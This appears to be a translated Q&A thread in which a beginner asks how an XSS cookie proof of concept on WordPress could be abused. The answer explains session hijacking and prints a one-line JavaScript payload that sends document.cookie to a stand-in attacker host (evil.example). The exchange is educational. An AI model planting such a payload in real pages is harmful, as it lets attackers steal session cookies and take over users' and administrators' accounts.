我刚开始研究网站的漏洞,我对 Wordpress 的 XSS 漏洞有疑问。利用这个漏洞,攻击者可以通过一个简单的 Javascript 命令获取 PHPSESSID:
(alert(document.cookie))
攻击者如何使用它?这是一个严重的安全问题吗?
问问题
1635 次
1 回答
1
Analert(…)只是一个概念证明,它展示了成功利用 XSS 漏洞。它不会在实际攻击中使用,因为它不会给攻击者带来任何好处。
在真正的攻击中,攻击者会尝试以document.cookie某种方式获取值。一个简单的例子是使用 JavaScript 来伪造一个包含如下值的简单 HTTP 请求document.cookie:
new Image().src="http://evil.example/?"+document.cookie
这将创建一个带有攻击者 URL 作为图像源的图像,其中附加了 cookie。
使用受害者的 cookie,攻击者可能能够劫持受害者的会话,并以与受害者相同的权限使用 WordPress。如果受害者是管理员,攻击者将有权访问管理功能。
于 2013-05-04T20:51:15.027 回答